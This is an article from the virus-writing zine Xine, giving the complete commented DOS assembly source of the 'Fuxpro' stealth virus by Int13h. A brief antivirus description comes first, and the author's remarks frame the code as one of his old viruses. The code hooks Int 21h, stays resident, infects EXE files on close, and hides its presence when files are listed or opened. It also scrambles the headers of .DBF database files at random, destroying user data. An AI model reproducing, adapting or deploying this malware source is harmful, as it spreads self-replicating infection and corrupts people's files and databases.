
Xine - issue #4 - Phile 306

/-----------------------------\
| Xine - issue #4 - Phile 306 |
\-----------------------------/


Comment ‘
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Fuxpro ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º Name : Fuxpro º
º Alias : None º
º Origin: Paraguay º
º º
º This is a stealth virus. It infects EXE files when they are º
º closed and disinfects them when they're opened. It tunnels to º
º find the original Int 21h handler, with a routine similar to º
º the one used by the Killer Virus. It marks infected files º
º setting the seconds to 62. Installs its own dummy error trapper. º
º The following text is found inside the virus code: º
º º
º [FUXPRO Virus by Int13h * MaDe In PaRaGuAy] º
º º
º This message is never displayed. The virus alters the header º
º of the files with extension .DBF when they are opened. The º
º .DBF is the extension for the database files, used by Foxpro, º
º DBase and many other database oriented languages. The virus º
º reads the header and completely rewrites it at random, quickly º
º creating chaos in the user's database files. º
º º
ÈÍÍ[Analysis: Mikko Hiponnen, Data Fellows Ltd's FuckProt Prof.]Íͼ
‘
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; I haven't a description of the DBF header. I just looked at ;
; some .DBF files and then I found the header too easy to under-;
; stand and to make chaos with it :) but with the DBF header des-;
; cription the joke can be multiplied. Sorry 4 my poor english.;
; Note that this is one of my old viruses, I put it here to ;
; fill some spaces :) ;
; ;
; cd 13 ;
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

.model tiny
.code
jumps ; Fix it if u want. I am lazy :)
org 0h

ViralSize equ (offset MicroShit-offset Fuxpro)
ParraVir1 equ ((ViralSize+1034+15)/16)+1
ParraVir2 equ ((ViralSize+1034+15)/16)
ViralPara equ (ViralSize+15)/16

FUXPRO: call Delta
Delta: mov bx,sp
mov bp,ss:word ptr [bx]
inc sp
inc sp
sub bp,offset delta ; Get delta

mov ax,'FX' ; Are we alive?
int 21h

cmp ax,'PR'
je FuxproYaReside ; Yes, we r

push es
push ds
mov ax,3521h ; Grab int 21h's vector
int 21h
cld
mov cs:[bp+word ptr Vieja21h],bx
mov cs:[bp+word ptr Vieja21h+2],es

mov ah,52h ; Look 4 the original entry point
int 21h
lds si,es:[bx+4]
lds si,ds:[si-4]
Rastrear:
dec si
cmp word ptr ds:[si],0e18ah
jne Rastrear
cmp byte ptr ds:[si+2],0ebh
jne Rastrear
Buscar_cli:
lodsb
sub al,0fah
jnz Buscar_cli
cmp word ptr ds:[si],0fc80h
jne Buscar_cli
dec si
mov cs:[bp+word ptr Real21h],si
mov cs:[bp+word ptr Real21h+2],ds

pop ds

mov ax,ds
dec ax
mov es,ax
mov ax,es:[3]
sub ax,ParraVir1
xchg bx,ax
push ds
pop es

mov ah,4ah ; Free memory
int 21h

mov ah,48h ; Allocate mem
mov bx,ParraVir2
int 21h

dec ax
mov es,ax
mov word ptr es:[1],8 ; DOS's
inc ax
mov es,ax
xor di,di

push cs
pop ds
lea si,[bp+offset Fuxpro] ; Move virus to mem
mov cx,(ViralSize+1034)
rep movsb

int 03h ; What I am doing here? Ask TASM!

push es
pop ds
mov ax,2521h ; Hook the inty
mov dx,offset Maldita21h
int 21h

pop es

FuxproYaReside:
push es
pop ds
mov ax,es
add ax,10h ; Restore control to the hoste
add cs:[(bp+CS_IP)+2],ax

cli
add ax,cs:[(bp+SS_SP)+2]
mov ss,ax
mov sp,cs:[(bp+SS_SP)]
sti

xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
xor bp,bp

db 0ebh,0h
db 0eah
CS_IP dw offset MicroShit,0h
SS_SP dw 0,0


db ' [FUXPRO Virus by Int13h * MaDe In PaRaGuAy] '



DescuajarLaCabeceraDelMalditoArchivoTipoDBF:
mov ax,03d02h
pushf
call dword ptr cs:[Real21h] ; Open the database
xchg bx,ax

call HoOk_24h
call PointerToApocalipsis

or dx,dx
jnz Lectura ; Not too small please...

cmp ax,1666
jb Cancelar

Lectura:call PointerToGenesis
call Segmentos

mov ah,3fh
mov dx,offset Buffer ; Read 1024 bytes to our buffer
mov cx,1024
int 21h

mov si,dx
cmp byte ptr [si],3 ; It is a real .DBF? Usually begins
je Continuar ; with a 
cmp byte ptr [si],0f5h ; or a õ
jne Cancelar

Continuar:
mov si,offset Buffer ; Point to the buffer
mov cx,1024 ; Read the whole buffer
Again: dec cx
and cx,cx ; Check our counter
je Cancelar
lodsw ; Read a word
cmp ax,200dh ; It is the end of the header?
je Hallado
cmp ax,2a0dh ; Maybe the 1§ reg is deleted...
jne Again

Hallado:dec si ; Rewind a byte
mov di,si ; Save original position of EOH
mov byte ptr [si],42 ; Mark 1§ reg as deleted (02ah)
mov si,offset Buffer
add si,43 ; Go to the field descriptor
Seguimos:
mov al,cs:[si] ; Read type in AL
call Cambiador ; Do some nasty changes on the header
cmp si,di ; Still below the End of Header?
jb Seguimos

call PointerToGenesis ; G0t0 BOF

mov ah,40h
mov dx,offset Buffer ; Write the modified header
mov cx,1024
int 21h

jmp Cancelar ; And g0 0n

Cambiador:
cmp al,'C' ; Character field?
je Caracter
cmp al,'N' ; Numeric field?
je Numerico
cmp al,'D' ; Date field?
je Fecha
cmp al,'L' ; Logical field?
je Logical
ParaRetornar:
add si,32 ; Point to the next field
ret ; and return to caller


Caracter: ; Play with character fields
in al,40h ; Read random byte from port 40h
cmp al,200
ja ParaRetornar ; If above than 200 nothing to do
cmp al,150 ; If between 150-200 cut the length
ja AlaMitad ; in the middle
cmp al,100 ; If between 100-150 then substract
ja Restarlo
and al,7 ; 0-7
test al,al ; 0?
jnz Sumarlo
mov al,3 ; Then, 3
Sumarlo:add byte ptr cs:[si+5],al ; Add AL, to the length of the field
jmp short ParaRetornar ; and return
AlaMitad:
mov al,byte ptr cs:[si+5] ; The number of characters
shr al,1 ; divide it
mov byte ptr cs:[si+5],al ; and write the new size
jmp short ParaRetornar ; dirty work finished
Restarlo:
and al,7 ; 0-7
inc al ; can be 0, then INC
sub byte ptr cs:[si+5],al ; SUBstract AL from the current size
jmp short ParaRetornar


Numerico: ; Play with numeric fields
in al,40h ; Get the random byte
cmp al,166 ; If it is above than 166 return
ja Retorno
cmp al,66 ; If below than 66 then, set the random
jb Here ; number in the decimals field
Modify: mov byte ptr cs:[si],'C' ; If above than 66 convert the numeric
jmp short ParaRetornar ; field into a character one
Here: mov byte ptr cs:[si+6],al ; AL in the decimals field
Retorno:jmp short ParaRetornar


Fecha: in al,40h ; Play with Date fiels
cmp al,32 ; If random is less than 32 then
jb Modify ; converts the Date to Character
jmp short Retorno


Logical:in al,40h ; Play with Logical fields
cmp al,132
ja Retorno ; If below then 132 don't do nothing
mov byte ptr cs:[si],'M' ; Converts the Logical field to Memo
jmp short Retorno


CANCELAR:
mov ah,3eh ; Close the sucker
pushf
call dword ptr cs:[Real21h]

push cs
pop ds

mov ax,2524h ; Unhook the error handler
lds dx,dword ptr ds:[Vieja24h]
int 21h

pop es ds di si dx cx bx ax
jmp Interrupcion_21h




DeSiNfEcTaR: ; When a file is opened we check it...
push ax bx cx dx si di ds es

push ds
pop es
cld
mov di,dx
mov cx,128
mov al,'.' ; Look 4 the period
repne scasb
jne Conti

xchg si,di
lodsw
or ax,2020h
cmp ax,'bd' ; .DB?
jne Conti
lodsb
or al,20h
cmp al,'f' ; .DBF?
je DescuajarLaCabeceraDelMalditoArchivoTipoDBF

Conti: mov ax,03d02h ; Open
pushf
call dword ptr cs:[Real21h] ; Emulate the int call
xchg bx,ax

mov ax,5700h
int 21h
mov word ptr cs:[Time],cx ; Infected?
mov word ptr cs:[Date],dx
and cl,00011111b
cmp cl,00011111b
jne Closear

call PointerToApocalipsis

sub ax,26
xchg dx,ax
mov cx,ax ; Positionate pointer at EOF
mov ax,4200h ; where there is our EXE header copy
int 21h

call Segmentos

mov ah,3fh
mov dx,offset Cabecera ; Read the header in our buffer
mov cx,1ah
int 21h

call PointerToApocalipsis

sub ax,ViralSize
xchg dx,ax
mov cx,ax ; Move pointer
mov ax,4200h
int 21h

call HoOk_24h ; To prevent...

mov ah,40h
xor cx,cx ; Cut the virus from the file
xor dx,dx
int 21h

call PointerToGenesis ; Pointer to BOF

mov ah,40h
mov cx,1ah
mov dx,offset Cabecera ; Write header
int 21h

mov ax,5701h
mov cx,word ptr [Time] ; Restore date and time
and cl,11100000b
or cl,1 ; Eliminate bad seconds
mov dx,word ptr [Date]
int 21h

Closear:mov ah,3eh ; Close the sucker
pushf
call dword ptr cs:[Real21h]

PopearTodo:
push cs
pop ds

lds dx,dword ptr ds:[Vieja24h]
mov ax,2524h
int 21h
pop es ds di si dx cx bx ax
jmp Interrupcion_21h


Stealth1: ; These routines are very common...
pushf
call dword ptr cs:[Real21h]
or al,al
jne FuckingErr

push ax
push bx
push es

mov ah,62h
int 21h

mov es,bx
cmp bx,es:[16h]
jne Napue

mov bx,dx
mov al,[bx]
push ax

mov ah,2fh
int 21h
pop ax
inc al
jne FCBOrdinario
add bx,7

FCBOrdinario:
mov al,byte ptr es:[bx+17h]
and al,00011111b
cmp al,00011111b
jne Napue

cmp word ptr es:[bx+1dh],(ViralSize+1024)
ja Restar

cmp word ptr es:[bx+1fh],0
je Napue

Restar: sub word ptr es:[bx+1dh],ViralSize
sbb word ptr es:[bx+1fh],0000
and byte ptr es:[bx+17h],1

Napue: pop es
pop bx
pop ax
FuckingErr:
retf 2



; My INT 21h handler

MaLdItA21H:
cmp ax,'FX' ; TSR checking
je ChEqUeO
cmp ah,3dh ; Opening
je DeSiNfEcTaR
cmp ah,3eh ; Closing
je InFeCtAr
cmp ah,11h ; Stealth me
je Stealth1
cmp ah,12h ; Stealth me
je Stealth1
cmp ah,4eh ; Stealth me
je Stealth2
cmp ah,4fh ; Stealth me
je Stealth2
Interrupcion_21h:
db 0eah
Vieja21h dd 0
ChEqUeO:mov ax,'PR' ; You are TSR
iret


Stealth2:
pushf
call dword ptr cs:[Real21h]
jc Aqueronte

pushf
push ax
push es
push bx

mov ah,2fh
int 21h

mov ax,es:[bx+16h]
and al,00011111b
cmp al,00011111b
jne Grrr

cmp word ptr es:[bx+1ah],(ViralSize+1024)
jb Grrr

sub word ptr es:[bx+1ah],ViralSize
sbb word ptr es:[bx+1ch],0000
and byte ptr es:[bx+16h],1 ; Hide, hide, hide
Grrr: pop bx
pop es
pop ax
popf
Aqueronte:
retf 2



InFeCtAr:
cmp bx,4 ; 5 or above please
jbe AqUi

push ax bx cx dx si di ds es

call HoOk_24h

push bx
mov ax,1220h
int 2fh

mov ax,1216h
xor bh,bh
mov bl,es:[di]
int 2fh ; SFT
pop bx

cmp word ptr es:[di+29h],'EX'
jne PopAll
cmp byte ptr es:[di+28h],'E' ; .EXE?
jne PopAll

mov byte ptr es:[di+4],20h ; set attrib 20h
mov byte ptr es:[di+2],2 ; Read/write axs

mov word ptr cs:[Handle],bx
mov ax,5700h
int 21h
mov word ptr cs:[Time],cx
mov word ptr cs:[Date],dx
and cl,00011111b ; Infected?
cmp cl,00011111b
je PopAll

call Segmentos
call PointerToGenesis

mov ah,3fh
mov cx,1ah ; The header
mov dx,offset Cabecera
int 21h

mov si,dx
cmp word ptr [si],'ZM'
je IsEXE
cmp word ptr [si],'MZ'
jne PopAll ; MZ or ZM present?

IsEXE: cmp byte ptr [si+24],'@' ; Windoze sucks
jae PopAll

les ax,dword ptr [Cabecera+014h]
mov [CS_IP],ax
mov [CS_IP+2],es ; Grab important stuff
les ax,dword ptr [Cabecera+0eh]
mov word ptr [SS_SP],es
mov word ptr [SS_SP+2],ax

call Segmentos

call PointerToApocalipsis
push dx
push ax

cmp ax,1024 ; Not too small
jb PopAll

call HoOk_24h

mov ah,40h
mov bx,word ptr [Handle]
mov cx,ViralSize ; Add virus to EOF
xor dx,dx
int 21h

call PointerToGenesis

pop ax
pop dx
push dx
push ax

mov ax,word ptr [Cabecera+08h]
mov cl,4
shl ax,cl ; Modify header in the habitual way
xchg bx,ax
pop ax
pop dx
push ax
push dx
sub ax,bx
sbb dx,0
mov cx,10h
div cx
mov word ptr [Cabecera+014h],dx
mov word ptr [Cabecera+016h],ax
mov word ptr [Cabecera+0eh],ax
mov word ptr [Cabecera+010h],0

pop dx
pop ax

add ax,ViralSize
adc dx,0
mov cl,9
push ax
shr ax,cl
ror dx,cl

xchg bx,bx

stc
adc dx,ax
pop ax
and ah,1
mov word ptr [Cabecera+4],dx
mov word ptr [Cabecera+2],ax

mov ax,word ptr [Cabecera+0ah]
clc
add ax,ViralPara
jc Donotadd
mov word ptr [Cabecera+0ah],ax
Donotadd:
mov word ptr [Cabecera+0Ch],0ffffh

mov bx,word ptr [Handle]
mov ah,40h
mov cx,01ah ; Write modified header
mov dx,offset Cabecera
int 21h

db 0b9h
Time dw 0
and cl,11100000b ; Restore time & date
or cl,00011111b ; set seconds to 62
db 0bah
Date dw 0
mov ax,5701h
int 21h

PopAll: push cs
pop ds

mov ax,2524h ; Unhook int 24h
lds dx,dword ptr [Vieja24h]
int 21h

pop es ds di si dx cx bx ax
Aqui: jmp Interrupcion_21h



Hook_24h:
push es
push bx

mov ax,3524h ; Trap the trapper
int 21h
mov word ptr cs:[Vieja24h],bx
mov word ptr cs:[Vieja24h+2],es
push cs
pop ds

mov ax,2524h
mov dx,offset Manejador24h
int 21h
pop bx
pop es
ret


Manejador24h:
mov al,03 ; Nothing is wrong
iret


Segmentos:
push cs cs
pop ds es ; ES=DS=CS
ret


PointerToGenesis:
mov ax,04200h ; BOF
jmp short Desplazar
PointerToApocalipsis:
mov ax,04202h ; EOF
Desplazar:
xor cx,cx
cwd
int 21h
ret

Cabecera db 01ah dup(0) ; The copy of the header will go here

MicroShit:
Handle dw 0
Vieja24h dd 0
Real21h dd 0
Buffer db 1024 dup (0)
mov ax,4c00h
int 21h
End FUXPRO

;Virus Ú---------------¿
; Virus À---¿ |
; Virus Ü Ü | Ú----¿ |
; Virus ßÛÜ ÜÛß | | | |
;Ú-----------------¿ ßÛÜ ÜÛß | À----Ù |
;| Ú--¿ Ú-------¿ | ßÛÜ ÜÛß | |
;À-Ù | | À-Ù ßÛÜ ÜÛß | Ú---¿ Ú---Ù
; | À-----¿ ßÛÜÜÛß | | | |
; | Ú-----Ù ßÛÛß | | | À--¿ ÜßßßßßßÜ
; | | Ú-¿ Ú-¿ ÜÛÛÜ Ú--------¿ | | À--¿ | Û Û
; | | | | | | ÜÛßßÛÜ | Ú----¿ | | | | À-¿ Û Û
; | | | | | | ÜÛß ßÛÜ | | | | | | À-¿ | Û Û
; Ú-Ù À-¿ | À--Ù | ÜÛß ßÛÜ | À----Ù | | | | | ßÜÜÜÜÜÜß
; À------Ù À------ÙÜÛß ßÛÜ | Ú------Ù À-Ù À-Ù
; Ûß ßÛ | | C0d3d by Int13h
; | | M4d3 in P4r4gu4y
; | | South Am3ric4
; À-Ù



